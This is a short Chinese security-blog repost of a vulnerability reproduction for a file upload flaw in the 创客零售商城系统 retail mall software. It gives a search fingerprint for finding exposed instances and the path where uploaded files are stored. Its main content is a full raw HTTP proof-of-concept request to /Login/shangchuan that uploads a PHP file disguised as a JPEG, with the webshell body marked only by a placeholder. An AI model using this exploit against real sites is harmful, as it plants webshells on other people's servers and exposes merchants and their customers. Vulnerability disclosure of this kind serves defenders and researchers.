创客零售商城系统存在shangchuan文件上传漏洞

admin
admin
admin
138985
文章
114
评论
2024年8月1日15:44:21评论67 views字数 1112阅读3分42秒阅读模式
 

1
漏洞描述
创客零售商城系统是一套帮助商家自动匹配客户订单的营销推送工具,实现任何商家和客户都可以免费使用的全自动营销系统!既是为所有客户提供的一套自动匹配互粉的推送工具。

2
漏洞复现
首页

创客零售商城系统存在shangchuan文件上传漏洞

bp发包

创客零售商城系统存在shangchuan文件上传漏洞

链接地址:地址/Uploads/txt/返回的值

3
网络测绘
"/Public/Xin/static/css/iconfont.css"

4
漏洞POC
POST /Login/shangchuan HTTP/2
Host: 地址
Cookie: PHPSESSID=1o6ilia62ptfrou9gpn4mc4cf2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------414826822120315253603069971739
Content-Length: 218
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

-----------------------------414826822120315253603069971739
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

木马内容
-----------------------------414826822120315253603069971739--
5
参考地址
https://mp.weixin.qq.com/s/wvEG_fDNeiTYOPrPOfpIZQ
 

原文始发于微信公众号(我吃饼干):【漏洞复现】创客零售商城系统存在shangchuan文件上传漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月1日15:44:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   创客零售商城系统存在shangchuan文件上传漏洞https://cn-sec.com/archives/2986676.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息